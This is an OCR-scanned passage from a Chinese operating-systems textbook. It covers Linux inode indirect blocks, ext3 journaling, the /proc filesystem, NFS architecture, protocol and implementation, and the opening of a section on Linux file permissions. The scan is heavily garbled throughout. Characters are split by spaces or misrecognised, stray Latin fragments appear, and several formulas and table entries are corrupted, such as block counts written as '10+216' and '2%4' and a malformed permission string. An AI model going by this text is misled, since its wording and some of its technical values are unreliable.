是 0〈 如 果 将 文件 位 置 存放 在 文件 描述 符 表 中 ，p2 将 看 到 0) ， 而 是 pl 
结束 时 的 位 置 。 


实现 这 一 操 的 方法 如 图 10-34 所 示 。 实 现 的 技巧 古 在 文件 接 述 符 表 
和 i 方太 表 之 间 引 入 一 个 新 的 表 ， 叫 做 打开 文件 搬 述 表 ， 并 将 文件 读 写 
ME (以 及 读 / 写 位 ) 放 到 里 面 。 在 这 个 图 中 ， 父 进程 是 shell 而 子 进 程 
首先 是 pl 然后 是 p2。 当 shell 生 成 pl1 时 ，p1 的 用 户 结构 (包括 文件 描述 
符 表 ) 是 shell 的 用 户 结构 的 一 个 副本 ， 因 此 两 者 都 指向 相同 的 打开 文 
件 描述 表 的 表 项 。 当 pl 结束 时 ，shell 的 文件 描述 符 仍然 指向 包含 p1 的 
文件 位 置 的 打开 文件 描述 。 当 shell 生 成 p2 时 ， 新 的 子 进程 自动 继承 文 
件 读 写 位 置 ， 甚 至 p2 和 shell 都 不 需要 知道 文件 读 写 位 置 到 撒 是 在 哪 
Ho 


然而 ， 当 不 相关 的 进程 打开 该 文件 时 ， 它 将 得 到 目 己 的 打开 文件 
描述 表 项 ， 以 及 自己 的 文件 读 写 位 置 ， 而 这 正 是 我 们 所 需要 的 。 
此 ， 打 开 文 件 描述 表 的 重点 是 允许 父 进程 和 子 进 程 共享 一 个 文件 读 写 
位 置 ， 而 给 不 相关 的 进程 提供 各 目 私 有 的 值 。 


再 来 看 读 操 作 ， 我 们 已 经 说 明了 如 何 定位 文件 读 写 位 置 和 i 节 点 "1i 
节点 包含 文件 前 12 个 数据 块 的 磁盘 地 址 。 如 果 文 件 位 置 是 在 前 12 个 
块 ， 那 么 这 个 块 被 读 入 并 且 其 中 的 数据 被 复制 给 用 户 。 对 于 长 度 大 于 
12 个 数据 块 的 文件 ，i 节 点 中 有 一 个 域 包含 一 个 一 级 间接 块 的 磁盘 地 
址 ， 如 图 10-34 所 示 。 这 个 块 舍 有 更 多 的 磁盘 块 的 磁 副 地 址 。 例 如， 如 
果 一 个 磁盘 块 大 小 为 1KB 而 磁盘 地 址 长 度 是 4 字 节 ， 那 么 这 个 一 级 间接 
块 可 以 保存 256 个 磁盘 地 址 。 因 此 这 个 方案 对 于 总 长 度 在 268KB 以 内 的 
文件 适用 。 
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除 此 之 外 ， 还 使 用 一 个 二 级 间接 块 。 它 包含 256 个 一 级 间接 块 的 地 
址 ， 每 个 一 级 间接 块 保存 256 个 数据 块 的 地 址 。 这 个 机 制 能 够 处 理 


10+216 个 块 (67 119 104 字 节 ) 


。 如 琳 这 样 仍然 不 够 ， ERAN ALR 


间接 块 留 下 了 空间 ， 三 级 间接 块 的 指针 指 疝 许多 二 级 间接 块 。 这 个 寻 
址 方案 能 够 处 理 大 小 为 2%4 个 1KB 块 (16GB) 的 文件 。 对 于 块 大 小 是 
8KB 的 情况 ， 这 个 寻 址 方案 能 够 文 持 最 大 64TB 的 文件 。 


3.Linux Ext3 文 件 系 统 


为 了 防止 由 系统 有 裔 并 和 电源 故障 造成 的 数据 丢失 ，ext2 文 件 系 统 必 
须 在 每 个 数据 块 创建 之 后 立即 将 其 写 出 到 磁盘 上 “。 必 需 的 磁盘 磁头 寻 
道 操 作 导 致 的 延迟 是 如 此 之 长 以 至 于 性 能 差 得 无 法 让 人 接受 。 因 此 ， 
写 操作 被 延迟 ， 对 文件 的 改动 可 能 在 30 秒 内 都 不 会 所 交 给 人 磁 副 ， 而 相 
对 于 现代 的 计算 机 硬件 来 说 ， 这 征 一 段 相当 长 的 时 间 间 隔 。 


为 了 增强 文件 系统 的 健壮 性 ，Linux 依 靠 日 志文 件 系 统 。Ext3， 作 
为 Ext2 文 件 系 统 的 改进 ， 束 是 一 个 日 志文 件 系 统 的 例子 。 


这 种 文件 系统 背后 的 基本 思想 是 维护 一 个 日 志 ， 该 日 志 顺 序 记录 
所 有 文件 系统 操作 。 通 过 顺序 写 出 文件 系统 数据 或 元 数据 (i 让 点 ， 超 
级 块 等 ) 的 改动 ， 该 操作 不 必 忍 受 随机 磁 副 访问 时 磁头 移动 市 来 的 开 
销 。 最 后 ， 这 些 改 动 将 被 写 到 适当 的 磁盘 地 址 ， 而 相应 的 日 志 项 可 以 
被 丢弃 。 如 果 系 统 甬 涡 或 电源 故障 在 改动 提交 之 前 发 生 ， 那 么 在 重启 
动 过 程 中 ， 系 统 将 检测 到 文件 系统 没有 被 正确 地 郝 载 。 然 后 系统 遇 历 
日 志 ， 并 执行 日 志 记 录 所 描述 的 文件 系统 改动 。 


Ext3 设 计 成 与 Ext2 高 度 兼 容 ， 事 实 上 ， 两 个 系统 中 所 有 的 核心 数据 
结构 和 磁 副 布局 者 是 相同 的 。 此 外 ， 一 个 作为 ext2 系 统 补 好 载 的 文件 系 
统 随后 可 以 作为 ext3 系 统 被 加 载 并 提供 日 志 能 力 。 


日 志 是 一 个 以 环形 缓冲 器 形式 组 织 的 文件 。 日 志 可 以 存储 在 主 文 
件 系统 所 在 的 设备 上 也 可 以 存储 在 其 他 设备 上 。 由 于 日 志 操 作 本 身 不 


被 日 志 记 录 ， 这 些 操 作 并 不 是 被 日 志 所 在 的 ext3 文 件 系 统 处 理 的 ， 而 是 
使 用 一 个 独立 的 日 志 块 设备 (Journaling Block Device, JBD) 来 执行 日 
志 的 读 / 写 操作 。 


JBD 文 持 三 个 主要 数据 结构 : 日 志 记 录 、 原 子 操作 处 理 和 事务 。 一 
个 日 志 记 录 搬 述 一 个 低级 文件 系统 操作 ， 该 操作 通常 导致 块 内 变化 。 
鉴于 系统 调用 (如 write) 包含 多 个 地 方 的 改动 一 一 i 节点 、 现 有 的 文件 
块 、 痢 的 文件 块 、 空 闲 块 列 表 等 ， 所 以 将 相关 的 日 志 记录 按照 原子 操 
作 分 成 组 。Ext3 将 系统 调用 过 程 的 起 始 和 结束 通知 JBD， 这 样 JBD 能 够 
保证 一 个 原子 操作 中 的 所 有 日 志 记 录 或 者 都 被 应 用 ， 或 者 没有 一 个 被 
应 用 。 最 后 ， 主 要 从 效率 方面 考虑 ，JBD 将 原子 操作 的 汇集 作为 事务 对 
待 。 一 个 事务 中 日 志 记录 是 连续 存储 的 。 仅 当 一 个 事务 中 的 所 有 日 志 
记录 都 被 安全 提交 到 磁 副 后 ，JBD 才 允许 日 志文 件 的 相应 部 分 被 丢弃 。 


把 每 个 磁盘 改动 的 日 志 记录 项 写 到 磁 表 可 能 开销 很 大 ，ext3 可 以 配 
置 为 保存 所 有 磁盘 改动 的 日 志 或 者 仅仅 保存 文件 系统 元 数据 GT ` 
超级 块 、 位 映射 等 ) 改动 的 日 志 。 只 记录 元 数据 会 使 系统 开销 更 小 ， 
性 能 更 好 ， 但 是 不 能 保证 文件 数据 不 会 损坏 。 一 些 其 他 的 日 志文 件 系 
统 仅仅 维护 关于 元 数据 操作 的 日 志 (例如 ，SGI 的 XFS) 。 


4./proc 文 件 系 统 


另 一 个 Linux 文 件 系统 是 /proc (process) 文件 系统 。 其 思想 来 自 于 
Bell 实 验 室 开发 的 第 8 版 UNIX， 后 来 被 4.4BSD 和 System V 采 用 。 不 过 ， 
Linux 在 几 个 方面 对 该 思想 进行 了 扩充 。 其 基本 概念 是 为 系统 中 的 每 个 
进程 在 /proc 中 创建 一 个 目 孙 。 目 录 的 名 字 是 进程 PID 的 十 制 数 值 。 例 
如 ，/proc/619 是 写 PID 为 619 的 进程 相对 应 的 目录 。 在 该 目录 下 是 进程 
言 息 的 文件 ， 如 进程 的 命令 行 、 环 境 变 量 和 信和 号 掩 码 等 。 事 实 上 ， 这 
些 文件 在 磁盘 上 并 不 存在 。 当 读 取 这 些 文件 时 ， 系 统 按 需 从 进程 中 抽 
取 这 些 信息 ， 并 以 标准 格式 将 其 返回 给 用 户 。 


许多 Linux 扩 展 与 /proc 中 其 他 的 文件 和 目录 相关 。 它 们 包含 各 种 各 
样 的 天 于 CPU、 亿 副 分 区 、 设 备 、 中 断 同 量 、 内 核 计 数 絮 、 文 件 系 
统 、 已 加 载 模块 等 信 轧 。 非 特权 用 户 可 以 读 取 很 多 这 样 的 信息 ， 于 是 
就 可 以 通过 一 种 安全 的 方式 了 解 系统 的 行为 。 其 中 的 部 分 文件 可 以 被 
写 入 ， 以 达到 改变 系统 参数 的 目的 。 


10.6.4 NES: 网 络 文件 系统 


网 络 在 Linux 中 起 着 重要 作用 ， 在 UNIX 中 也 是 如 此 一 一 自从 网 络 

出 现 开始 (第 一 个 UNIX 网 络 是 为 了 将 新 的 内 核 从 PDP-11/70 转 移 到 

Interdata 8/32 上 而 建立 的 ) 。 本 市 将 考察 Sun Microsystem 的 NFS (网 络 
文件 系统 ) 。 该 文件 系统 应 用 于 所 有 的 现代 Linux 系 统 中 ， 其 作用 是 将 
不 同 计算 机 上 的 不 同文 件 系 统 连接 成 一 个 逻辑 整体 。 当 前 主流 的 NFS 实 
现 是 1994 年 提出 的 第 3 版 % NFS 第 4 版 在 2000 年 提出 ， 并 在 前 一 个 NFS 体 
系 结构 上 做 了 一 些 增 强 。NFS 有 三 个 方面 值得 关注 :体系 结构 、 协 议和 
实现 。 我 们 现在 将 依次 考察 这 三 个 方面 ， 首 先是 简化 的 NFS 第 3 版 ， 然 

后 简要 探讨 第 4 版 所 做 的 增强 。 


1.NFS 体 系 结构 


NEFS 背 后 的 基本 思想 是 允许 任意 选 定 的 一 些 客户 端 和 服务 器 共享 一 
个 公共 文件 系统 。 在 很 多 情况 下 ， 所 有 的 客户 并 和 服务 紫 部 在 同一 个 
局 域 网 中 ， 但 这 并 不 是 必需 的 。 如 采 服 务 絮 距离 客户 端 很 还 ，NFS 也 可 
以 在 广域网 上 运行 。 简 单 起 见 ， 我 们 还 是 说 客户 端 和 服务 右 ， 束 好 像 
它们 位 于 不 同 的 机 器 上 ， 但 实际 上 ，NFS 人 允许 一 台 机 器 同时 既是 客户 端 
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每 一 个 NFS 服 务 顺 都 导出 一 个 或 多 个 目录 供 远 程 客户 端 访问 。 当 一 
个 目 永 可 用 时 ， 它 的 所 有 子 目 孙 也 都 可 用 ， 因 而 事实 上 ， 整 个 目 永 树 
通常 作为 一 个 单元 导出 。 服 务 事 导出 的 目录 列表 用 一 个 文件 来 维护 ， 
古 /etc/exports。 因此 服务 器 局 动 后 这 些 目录 可 以 被 目 动 地 导出 。 客 
己 端 通过 挂 载 这 些 导出 的 目录 来 访问 它们 。 当 一 个 客户 端 挂 载 了 一 个 
(和 远程) 目录， 该 目录 就 成 为 客户 端 目录 层次 的 一 部 分 ， 如 图 10-35 所 
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cat cp Is mv sh 


1 号 服务 器 2 号 服务 器 
图 10-35 远程 挂 载 的 文件 系统 的 例子 。 图 中 的 方 框 表示 目录 ， 圆 形 
表示 文件 
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盘 工 作 站 通常 只 有 一 个 框架 文件 系统 (在 RAM 中 ) ， 它 从 远程 服务 器 
中 得 到 所 有 的 文件 ， 束 像 上 例 中 一 样 。 类 似 地 ， 客 户 端 1 将 服务 絮 2 中 
的 /projects 目 录 挂 载 到 目 己 的 /usr/ast/work 目 录 ， 因 此 它 用 
usr/ast/work/proj1/a 就 可 以 访问 文件 a。 最 后， 客户 端 2 也 挂 载 了 projects 
目录 ， 它 可 以 用 /mntproj1/a 访 问 文件 a。 从 这 里 可 以 看 到 ， 由 于 不 同 的 
客户 闹 将 文件 挂 载 到 各 目 目 隶 树 中 不 同 的 位 置 ， 同 一 个 文件 在 不 同 的 
客户 端 有 不 同 的 名 字 。 对 客户 端 来 说 挂 载 点 是 完全 局 部 的 ， 服 务 器 不 
会 知道 文件 在 任何 一 个 客户 冰 中 的 挂 载 点 。 


2.NFS 协 议 


由 于 NFS 的 目标 之 一 古文 持 异 构 系统 ， 客 户 并 和 服务 右 可 能 在 不 同 
硬件 上 运行 不 同 操作 系统 ， 因 此 对 客户 端 和 服务 器 之 间 的 接口 给 予 明 
确定 义 是 很 关键 的 。 只 有 这 样 ， 才 有 可 能 让 任何 一 个 新 的 客户 端 能 够 
跟 现 有 的 服务 占 一 起 正确 工作 ， 反 之 亦 然 。 


NFS 通 过 定义 两 个 客户 端 - 服 务 融 协议 来 实现 这 一 目标 。 一 个 协议 
就 是 从 客户 端 发 送 到 服务 器 的 一 组 请 求 以 及 从 服务 器 返回 给 客户 端的 
啊 应 的 集合 。 
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并 不 关心 目录 将 被 挂 载 到 何 处 ， 因 此 请 求 消息 中 并 不 包含 挂 载 地 址 。 
如 末路 径 名 是 合法 的 并 且 该 目录 已 被 导出 ， 那 么 服务 器 癌 客 户 剖 返回 
一 个 文件 句柄 。 这 个 文件 句柄 中 的 域 惟一 地 标识 了 文件 系统 类 型 、 磁 
盘 、 目 录 的 i 节 后 号 以 及 安全 信息 等 。 随 后 对 已 挂 载 目 录 及 其 子 目 邓 中 
文件 的 读 写 都 使 用 该 文件 句柄 。 


Linux 局 动 时 会 在 进入 多 用 户 之 前 运行 shell 脚 本 /etcrc。 可 以 将 挂 载 
远程 文件 系统 的 命令 写 入 该 脚本 中 ， 这 样 吏 可 以 在 允许 用 户 登 录 之 前 
目 动 挂 载 必 要 的 远程 文件 系统 。 此 外 ， 大 部 分 Linux 版 本 也 文 持 自动 挂 
载 。 这 个 符 性 允许 一 组 远程 目录 跟 一 个 本 地 目 如 相关 联 。 当 客户 端 局 
动 时 ， 并 不 挂 载 这 些 远 程 目录 (甚至 不 与 它们 所 在 的 服务 器 进行 联 
络 ) 。 相 反 ， 在 第 一 次 打开 远程 文件 时 ， 操 作 系 统 向 每 个 服务 器 发 送 
一 条 信息 。 第 一 个 啊 应 的 服务 郁 胜 出 ， 其 目 永 被 挂 载 。 


相对 于 通过 /etc/rc 文 件 进 行 静 态 挂 载 ， 目 动 挂 载 具 有 两 个 主要 优 
势 。 第 一 ， 如 果 /etc/rc 中 列 出 的 某 个 NFS 服 务 右 出 了 故障 ， 那 么 客户 端 
将 无 法 局 动 ， 或 者 至 少 会 市 来 一 些 困 难 、 延 迟 以 及 很 多 出 错 信 息 。 如 
果 用 户 当前 根本 就 不 需要 这 个 服务 器 ， 那 么 刚才 的 工作 就 日 费 了 。 第 
二 ， 人 允许 客户 端 并 行 地 莹 试 一 组 服务 器 ， 可 以 实现 一 定 程度 的 容错 性 


(因为 只 要 其 中 一 个 是 在 运行 的 就 可 以 了 ) ， 而 且 性 能 也 可 以 得 到 提 
高 《通过 选择 第 一 个 响应 的 服务 器 一 一 推测 该 服务 器 负载 最 低 ) 。 


另 一 方面 ， 我 们 默认 在 目 动 挂 载 时 所 有 可 选 的 文件 系统 都 生 完 全 
相同 的 。 由 于 NFS 不 提供 对 文件 或 目 孙 复制 的 文 持 ， 用 户 需 要 上 自己 确保 
所 有 这 些 文件 系统 都 是 相同 的 。 因 此 ， 目 动 挂 载 多 数 情况 下 被 用 于 包 
含 系统 代码 的 只 读 文件 系统 和 其 他 很 少 改动 的 文件 。 


第 二 个 NFS 协 议 是 为 访问 目 孙 和 文件 设计 的 。 客 户 端 可 以 通过 回 服 
务 名 发 送 消 居 来 操作 上 日 录 和 读 写 文件 。 客 户 问 也 可 以 访问 文件 属性 ， 
如 文件 模式 、 大 小 、 上 次 修改 时 间 。NFS 文 持 大 多 数 的 Linux 系 统 调 
用 ,但 是 也 许 很 让 人 惊讶 的 是 ，open 和 close 不 被 支持 。 


对 open 和 close 的 省 略 并 不 是 意外 事件 ， 而 纯粹 是 有 意 为 之 。 没 有 
必要 在 读 一 个 文件 之 前 先 打 开 它 ， 也 没有 必要 在 读 完 后 关闭 它 。 读 文 
件 时 ， 客 户 端 向 服务 器 发 送 一 个 包含 文件 名 的 lookup 消 息 ， 请 求 查 询 该 
文件 并 返回 一 个 标识 该 文件 的 文件 句柄 ( 即 包含 文件 系统 标识 符 i 节 点 
号 以 及 其 他 数据 ) 。 与 open 调 用 不 同 ，lookup 操 作 不 向 系统 内 部 表 中 复 
制 任 何 信息 。read 调 用 包含 要 读 取 的 文件 的 文件 句柄 ， 起 始 偏 移 量 和 和 需 
要 的 字 市 数 。 每 个 这 样 的 消息 都 症 目 包含 的 。 这 个 方案 的 优势 是 在 两 
次 read 调 用 之 间 ， 服 务 器 不 需要 记 住 任何 关于 已 打开 的 连接 的 信息 。 
此 ， 如 采 一 个 服务 硕 在 朋 溃 之 后 恢复 ， 所 有 关于 已 打开 文件 的 信息 都 


\ 会 丢失 ， 因 为 这 些 信息 原本 吏 不 存在 。 像 这 样 不 维护 打开 文件 的 状 
态 信 息 的 服务 痊 称 作 是 无 状态 的 。 


不 和 的 是 ，NEFS 方 法 使 得 难以 实现 精确 的 Linux 文 件 语义 。 例 如 ， 
在 Linux 中 一 个 文件 可 以 被 打开 并 锁定 以 防止 其 他 进程 对 其 访问 。 当 文 
件 关闭 时 ， 锁 被 释放 。 在 一 个 像 NFS 这 样 的 无 状态 服务 器 中 ， 锁 不 能 与 
已 打开 的 文件 相关 联 ， 这 是 因为 服务 右 不 知道 哪些 文件 是 打开 的 。 
此 ，NFS 需 要 一 个 独立 的 ， 附 加 的 机 制 来 处 理 加 锁 。 


NFS 使 用 标准 UNIX 保 护 机 制 ， 为 文件 属 主 、 组 和 其 他 用 户 使 用 


读 、 写 、 执 行 位 (rwx bits) (在 第 1 章 中 提 到 过 ， 将 在 下 面 详细 讨 
论 


) 。 最 初 ， 每 个 请 求 消 息 仅 仅 包 含 调 用 者 的 用 户 ID 和 组 ID，NFS 服 
务 器 用 它们 来 验证 访问 。 实 际 上 ， 它 信任 客户 端 ， 认 为 客户 端 不 会 进 
行 欺骗 。 若 干 年 来 的 经 验 充 分 表明 了 这 样 一 个 假设 。 现 在 ， 可 以 使 用 
公 钥 密码 系统 建立 一 个 安全 密 钥 ， 在 每 次 请 求 和 应 答 中 使 用 它 验证 客 
户 端 和 服务 器 。 启 用 这 个 选项 后 ， 亚 意 的 客户 端 就 不 能 伪装 成 另 一 个 
客户 端 了 ， 因 为 它 不 知道 其 他 窗户 端的 安全 密 钥 。 


3.NFS 实 现 


尽管 客户 端 和 服务 融 代 码 实现 独立 于 NFS 协 议 ， 但 大 多 数 Linux 系 
统 使 用 一 个 类 似 图 10-36 所 示 的 三 层 实现 。 顶 层 是 系统 调用 层 ， 这 一 层 


ee 在 解析 调用 和 参数 检查 结束 后 ， 
系统 (VES) 层 。 
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图 10-36 NFS 层次 结构 


VFS 层 的 任务 是 维护 一 个 表 ， 每 个 打开 的 文件 在 该 表 中 有 一 个 表 
项 。VFS 层 为 每 个 打开 文件 保存 一 个 虚拟 i 节点 (或 称 为 v-node) ° vii 
点 用 来 说 明文 件 是 本 地 文件 还 是 远程 文件 。 对 于 远程 文件 ，v 节 点 提供 
足够 的 信息 使 客户 端 能 够 访问 它们 。 对 于 本 地 文件 ， 则 记录 其 所 在 的 
文件 系统 和 文件 的 节点， 这 是 因为 现代 Linux 系 统 能 支持 多 文件 系统 
(例如 ext2fs、/proc、FAT 等 ) 。 尽 管 VFS 是 为 了 文 持 NFS 而 发 明 的 ,但 


多 数 现 代 Linux 系 统 将 VFS 作 为 操作 系统 的 一 个 组 成 部 分 ， 不 管 有 没有 
使 用 NFS。 


为 了 理解 如 何 使 用 v 廊 点， 我们 来 跟 踩 一 组 顺序 执行 的 mount， 
open 和 read 调 用 。 要 挂 载 一 个 远程 文件 系统 ， 系 统管 理 员 (或 /etc/rc) 
调用 mount 程 序 ， 并 指明 远程 目 永 、 远 程 目 孙 将 被 挂 载 到 哪个 本 地 目 
录 ， 以 及 其 他 信息 。mount 程 序 解析 要 被 挂 载 的 远程 目录 并 找到 该 目录 
所 在 的 NFS 服 务 器 ， 然 后 与 该 机 絮 连 授 ， 请 求 远程 目 如 的 文件 句 顶 。 如 
果 该 目录 存在 并 可 被 远程 挂 载 ， 服 务 右 束 奴 回 一 个 该 目录 的 文件 句 
柄 。 最 后 ，mount 程 序 调 用 mount 系 统 调用 ， 将 该 句柄 传递 给 内 核 。 


然后 内 核 为 该 远程 目录 创建 一 个 v 节 点 ， 并 要 求 客 户 端 代码 (图 10- 
36 所 示 ) 在 其 内 部 表 中 创建 一 个 rT 点 (remote i-node) 来 保存 该 文件 
AltA ° VSIA ° VEFS 中 的 每 一 个 v 和 点 最 终 要 么 包含 一 个 指 同 
NFS Pie CIS Pr 点 的 指针 ， 要 么 包含 指 问 一 个 本 地 文件 系统 的 iT 
点 的 指针 〈 在 图 10-36 中 用 虚线 标 出 ) 。 因 此 ， 我 们 可 以 从 v 市 点 中 判断 
一 个 文件 或 目录 是 本 地 的 还 是 远程 的 。 如 果 是 本 地 的 ， 可 以 定位 相应 
的 文件 系统 和 i 秆 点 。 如 果 是 远程 的 ， 可 以 找到 远程 主机 和 文件 句柄 。 


当 客户 端 打 开 一 个 远程 文件 时 ， 在 解析 路 径 名 的 某 个 时 刻 ， 内 核 
会 磁 到 挂 载 了 远程 文件 系统 的 目 好 。 内 核 看 到 该 目 邓 是 远程 的 ， 并 从 
该 目录 的 v 太 上 反 中 找到 指 同 r 届 所 的 指针 ， 然 后 要 求 NFS 客 户 问 代码 打开 
文件 。NFS 客 户 端 代码 在 与 该 目 孙 关联 的 远程 服务 器 上 查询 路 径 名 中 剩 


余 的 部 分 ， 并 返回 一 个 文件 句柄 。 它 在 自己 的 表 中 为 该 远程 文件 创建 
一 个 FF 点 并 报告 给 VFS 层 。VFS 层 在 自己 的 表 中 为 该 文件 建立 一 个 指 
回 该 r 玉 点 的 v 闻 点 。 从 这 里 我 们 再 一 次 看 到 ， 每 一 个 打开 的 文件 或 目录 
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返回 给 调用 者 的 是 远程 文件 的 一 个 文件 描述 符 。VFS 层 中 的 表 将 该 
文件 描述 符 映 射 到 vT 点 。 注 意 ， 服 务 器 端 没 有 创建 任何 表 项 。 尽 管 服 
务 郁 已 经 准备 好 在 收 到 请 求 时 提供 文件 句柄 ， 但 它 并 不 记录 哪些 文件 
有 文件 句柄 ， 哪 些 文件 没有 。 当 一 个 文件 句柄 发 送 过 来 要 求 访问 文件 
时 ， 它 检查 该 句柄 。 如 果 是 有 效 的 句柄 ， 束 使 用 它 。 如 果 安 全 策略 被 
局 用 ， 验 证 包含 对 RPC 头 中 的 认证 密 钥 的 检验 。 


当 文件 描述 符 被 用 于 后 续 的 系统 调用 (例如 read) 时 ，VFS 层 先 定 
位 相应 的 v 点 ， 然 后 根据 它 确定 文件 是 本 地 的 还 是 远程 的 ， 同 时 确定 
BP Si 点 或 r 点 是 摘 述 该 文件 的 。 然 后 加 服务 夷 发 送 一 个 消 轧 ， 该 消 
Rae AN > MEE 〈 由 客户 端 维持 ， 而 不 是 服务 器 端 ) 和 字 节 数 。 
出 于 效率 方面 的 考虑 ， 即 使 要 传输 的 数据 很 少 ， 客 户 端 和 服务 大 之 辣 
的 数据 传输 也 使 用 大 数据 块 ， 通 党 是 8192 字 廊 。 


当 请 求 消 居 到 达 服 务 器 ， 它 被 送 到 服务 紫 的 VFS 层 ， 在 那里 将 判断 
所 请 求 的 文件 在 哪个 本 地 文件 系统 中 。 然 后 ，VFS 层 调用 本 地 文件 系统 
去 恋 取 并 返回 请 求 的 字 世 。 随 后 ， 这 些 数 据 被 传送 给 客户 问 。 客 户 病 
的 VFS 层 接收 到 它 所 请 求 的 这 个 8KB 块 之 后 ， 又 自动 发 出 对 下 一 个 块 的 


请 求 ， 这 样 当 我 们 需要 下 一 个 块 时 就 可 以 很 快 地 得 到 。 这 个 特性 称 为 
预 读 (read ahead) ， 它 极 大 地 提高 了 性 能 。 


客户 端 癌 服 务 右 写 文 件 的 过 程 是 类 似 的 。 文 件 也 古 以 8KB 块 为 持 
位 传输 。 如 条 一 个 write 系统 调用 提供 的 数据 少 于 8KB， 则 数据 在 客户 
端 本 地 累积 ， 直 到 达到 8KB 时 才 发 送 给 服务 占 。 当 然 ， 当 文件 天 闭 
时 ， 所 有 的 数据 都 立即 发 送 给 服务 器 。 


另 一 个 用 来 改善 性 能 的 技术 坪 缓 存 ， 与 在 通 利 的 UNIX 系 统 中 的 用 
法 一 样 。 服 务 需 缓存 数据 以 避免 磁 强 访问 ， 但 这 对 客户 端 而 言 征 不 可 
见 的 。 客 户 端 维护 两 个 缓存 ; 一 个 缓存 文件 属性 《iT 点) ， 另 一 个 缓 
存 文件 数据 。 当 需要 i 节点 或 文件 块 时 ， 就 在 缓存 中 检查 有 无 符合 的 数 
据 。 如 末 有 ， 束 可 以 避免 网 络 流量 了 。 


客户 端 缓存 对 性 能 提升 起 到 很 大 帮助 的 同时 ， 也 带 来 了 一 些 令 人 
讨厌 的 问题 。 假 设 两 个 客户 站 都 缓存 了 同一 个 文件 块 ， 并 且 其 中 一 个 
客户 端 修改 了 它 。 当 另 一 个 客户 读 该 块 时 ， 它 读 到 的 是 上 昌 的 数据 值 。 
这 时 缓存 是 不 一 致 的 。 


考虑 到 这 个 问题 可 能 市 来 的 挛 重 性 后 采 ，NES 实 现 做 了 一 些 事情 来 
缓解 这 一 问题 。 第 一 ， 为 每 个 缓存 了 的 块 关联 一 个 定时 天 。 当 定时 天 
到 期 时 ， 缓 存 的 项 目 束 补 丢弃 。 通 前 ， 数 据 块 的 时 间 是 3 秒 ， 目 隶 块 的 
时 间 是 30 秒 。 这 稍微 减少 了 一 些 风险 。 男 外 ， 当 打开 一 个 有 缓存 的 文 
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后 修改 时 间 晚 于 本 地 缓存 时 间 ， 那 么 旧 的 副本 被 丢弃 ， 新 副本 从 服务 
右 取 回 。 最 后 ， 每 30 秒 缓存 是 时 紫 到 期 一 次 ， 绥 存 中 所 有 的 “ 脏 ” 块 

( 即 修改 过 的 块 ) 都 发 送 到 服务 器 。 尽 管 并 不 完美 ， 但 这 些 修补 使 得 
系统 在 多 数 实际 环境 中 高 度 可 用 。 


4.NFS 第 4 版 


网 络 文件 系统 第 4 版 是 为 了 商 化 其 以 前 版 本 的 一 些 操 作 而 设计 的 。 
相对 于 上 面 描述 的 第 3 版 NFS， 第 4 版 NFS 是 有 状态 的 文件 系统 。 这 样 融 
允许 对 远程 文件 调用 open 操 作 ， 因 为 远程 NFS 服 务 如 将 维护 包括 文件 指 
针 在 内 的 所 有 文件 系统 相关 的 结构 。 读 操作 不 再 需要 包含 绝对 读 取 范 
围 了 ， 而 可 以 从 文件 指针 上 次 所 在 的 位 置 开 始 增加 。 这 束 使 消 妃 变 
短 ， 同 时 可 以 在 一 次 网 络 传输 中 捆绑 多 个 第 3 版 NFS 的 操作 。 


10.7 Linux 的 安全 性 


Linux 作 为 MINIX 和 UNIX 的 复制 品 ， 几 乎 从 一 开始 就 是 一 个 多 用 
户 系统 。 这 上 段 历史 意味 着 Linux 从 早期 开始 就 建立 了 安全 和 信息 访问 控 
制 。 在 接 下 来 的 几 和 里 ， 我 们 将 关注 Linux 安 全 性 的 一 些 方面 。 


10.7.1 基本 概念 


一 个 Linux 系 统 的 用 户 群体 由 一 定数 量 的 注册 用 户 组 成 ， 其 中 每 个 
用 户 拥 有 一 个 惟一 的 UID (RFID) 。UID 是 介 于 0 到 65 535 之 间 的 一 个 
整数 。 文 件 (进程 及 其 他 资源 都 标记 了 它 的 所 有 者 的 UID。 尽 管 可 以 
改变 文件 所 有 权 ， 但 是 默认 情况 下 ， 文 件 的 所 有 者 是 创建 该 文件 的 用 
户 o 


用 户 可 以 被 分 组 ， 其 中 每 组 同样 由 一 个 16 位 的 整 效 标记 ， 叫 做 GID 
(组 ID) 。 给 用 户 分 组 通过 在 系统 数据 库 中 添加 一 条 记 杂 指明 哪个 用 
户 属 于 哪个 组 的 方法 手工 (由 系统 管理 员 ) 完成 。 一 个 用 户 可 以 同时 
属于 多 个 组 。 为 简单 起 见 ， 我 们 不 再 深入 讨论 这 个 问题 。 


Linux 中 的 基本 安全 机 制 很 简单 。 每 个 进程 记录 它 的 所 有 者 的 UID 
和 GID。 当 一 个 文件 被 创建 时 ， 它 的 UID 和 和 GID 被 标记 为 创建 它 的 进程 
的 UID 和 GID。 该 文件 同时 获得 由 该 进程 决定 的 一 些 权 限 。 这 些 权 限 指 


定 所 有 者 、 所 有 者 所 在 组 的 其 他 用 户 及 其 他 用 户 对 文件 具有 什么 样 的 
访问 权限 。 对 于 这 三 类 用 户 而 言 ， 潜 在 的 访问 权限 为 读 、 写 和 执行 ， 
分 别 由 r、w 和 x 标 记 。 当 然 ， 执 行文 件 的 权限 仅 当 文件 是 可 执行 二 进 制 
程序 时 才 有 意义 。 试 图 执行 一 个 拥有 执行 权限 的 非 可 执行 文件 (BH, 
并 非 由 一 个 合法 的 文件 头 开始 的 文件 ) 会 导致 错误 。 因 为 有 三 类 用 
户 ， 每 类 用 户 的 权限 由 3 个 比特 位 标记 ， 那 么 9 个 比特 位 束 足 够 标记 访 
问 权 限 。 图 10-37 给 出 了 一 些 9 位 数字 及 其 舍 义 的 例子 : 


二 进 制 标记 允许 的 文件 访问 权限 。 
111000000 | rwx------ | 所 有 者 可 以 读 、 写 和 执行 l 
| 111111000 | wxwx--- | 所 有 者 和 组 可 以 读 、 写 和 执行 
| 110100000 | rw-r----- 所 有 者 可 以 读 和 写 ， 组 可 以 读 
110100100 | rw-r--r-— 所 有 者 可 以 读 和 写 ， 其 他 人 可 以 读 
| 111101101 | rwxr-xr-x ”| 所 有 者 拥有 所 有 权限 ， 其 他 人 可 以 读 和 执行 
| 000000000 | --------- | 所 有 人 都 不 拥有 任何 权限 | 
000000111 | ------ wx | 只 有 组 以 外 的 其 他 用 户 拥 有 所 有 权限 (奇怪 但 是 合法 ) 


图 10-37 文件 保护 模式 的 例子 


图 10-37 前 两 行 的 意思 很 清楚 ， 人 允许 所 有 者 以 及 与 所 有 者 同 组 的 人 
所 有 权限 。 接 下 来 的 一 行 允许 所 有 者 同 组 用 户 读 权限 但 是 不 可 以 改变 
